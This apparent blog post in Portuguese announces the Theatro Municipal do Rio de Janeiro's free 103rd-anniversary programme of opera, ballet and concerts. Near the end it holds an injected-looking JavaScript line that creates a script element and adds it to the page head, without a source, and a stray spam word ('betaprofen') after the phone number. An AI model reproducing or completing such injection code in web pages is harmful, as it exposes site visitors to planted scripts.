LateralProgramaçãoRio de Janeiro

Municipal RJ comemora 103 anos

Comemoração envolve extensa programação gratuita, com espetáculos de ópera e balé ao longo de todo o dia.

SERVIÇO

Theatro Municipal do Rio de Janeiro
Praça Floriano, s/nº – Centro
Informações: (21) 2332-9191 betaprofen

Dia 14 de julho, a partir de 10h.

Entrada Franca

 
O Theatro Municipal do Rio de Janeiro, vinculado à Secretaria de Estado de Cultura, vai oferecer ao público no próximo sábado, 14 de julho, programação variada e gratuita para celebrar os seus 103 anos de existência. A festa já virou tradição no calendário cultural da cidade e reúne apresentações com os três corpos estáveis do Theatro, coro, ballet e orquestra, e ainda  com a Escola Estadual de Dança Maria Olenewa, Os Pequenos Mozart, Grupo de Teatro do Colégio Estadual Walter Orlandini e a Companhia Jovem de Ballet.

A festa começa às 10h., com um concerto nas escadarias do foyer de entrada com Os Pequenos Mozart, grupo formado por crianças de 3 a 14 anos, sob direção artística de Suray Soren. O conjunto é dono de um repertório vasto, que inclui obras de compositores clássicos assim como populares.

Em seguida, às 11h., os alunos do Grupo de Teatro do Colégio Estadual Walter Orlandini, apresentam, a convite do Theatro Municipal, o espetáculo Primavera nº1, que integrou a 1ª Semana de Arte da Rede Estadual de Ensino. A obra tem música de Puccini e Beethoven e coreografia de Eric Frederic, direção e concepção de Carla Camurati, coordenação musical do maestro Sílvio Viegas, preparação vocal e regência do coro de Maurílio Santos Costa e arranjos de Glauco Fernandes. O espetáculo foi uma encomenda do Secretário de Educação, Wilson Risolia. Pela primeira vez, os adolescentes tomaram contato com o universo clássico. O resultado foi tão bom que o Theatro Municipal convidou o grupo para participar das comemorações do aniversário.

Depois, os  alunos  de diversos segmentos da Escola Estadual de Dança Maria Olenewa tomam conta do palco para interpretar  um programa com as coreografias Fantasia Brasileira,  de Eric Frederic sobre música de Gottschalk; Primeiros Passos, de Paula Albuquerque com música de J. Strauss;Tarantella de Natalia Yananis para a música
popular italiana; e o O Sonho de Don Quixote, com música de Minkus em versão assinada por Dalal Achcar.

A Companhia Jovem de Ballet do Rio de Janeiro, que tem direção artística de Dalal Achcar e direção geral de Mariza Estrella, vai dançar peças de seu  repertório:  FugA_Technic@… , com música de Alexander Bàlanescu e coreografia de  Eric Frederic; Pas-de-deux de Com Amor, de Dalal Achcar e música de Adolph Charles Adam; Mozarteando,criada por Ivonice Satie sobre obra de Mozart; Slow Dancer, de Boz Scaggs/Chie Ayado (música) e coreografia de Eric Frederic; Forró, música do Barbatuques, Naná Vasconcelos e Pedro Luíse coreografia de Janice Botelho.

Com apresentação marcada para 15., o Ballet do Theatro Municipal traz à cena  uma Gala com  o  que de melhor a Companhia apresentou ao longo das últimas temporadas. O espetáculo reúne trechos das obras Carmen, de Roland Petit; Romeu e Julieta, de John Cranko; A Criação, de Uwe Scholz; Don Quixote, em versão de Dalal Achcar,  e Nascimento Novo, de David Parsons com trilha de Milton Nascimento.

Para encerrar a comemoração, às 20h30, o Coro e a Orquestra Sinfônica do Theatro Municipal oferecem  Rigoletto,  ópera de Giuseppe Verdi, com direção cênica de Píer Francesco Maestrini, regência do maestro Osvaldo Ferreira, e nos papéis principais o barítono italiano Roberto Frontali (Rigoletto), a soprano albanesa Artemisa Repa (Gilda), o tenor carioca Fernando Portari (Duque), além de Savio Sperandio, Adriana Clis e Manuel Alvarez, entre outros. Uma das obras mais populares do repertório Verdiano,  Rigoletto abriu a temporada lírica 2012 do Theatro Municipal e se encontra em cartaz.

PROGRAMAÇÃO

– Às 10h. abertura da casa – Pequenos Mozart

– Às 11h. – Alunos do Grupo de Teatro do Colégio Estadual Walter Orlandini e Escola de Dança Maria Olenewa

– Às 13h. – Cia Jovem de Ballet

– Às 15h. – Ballet do Theatro Municipal

– Às 20h30 – Rigoletto.

 var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.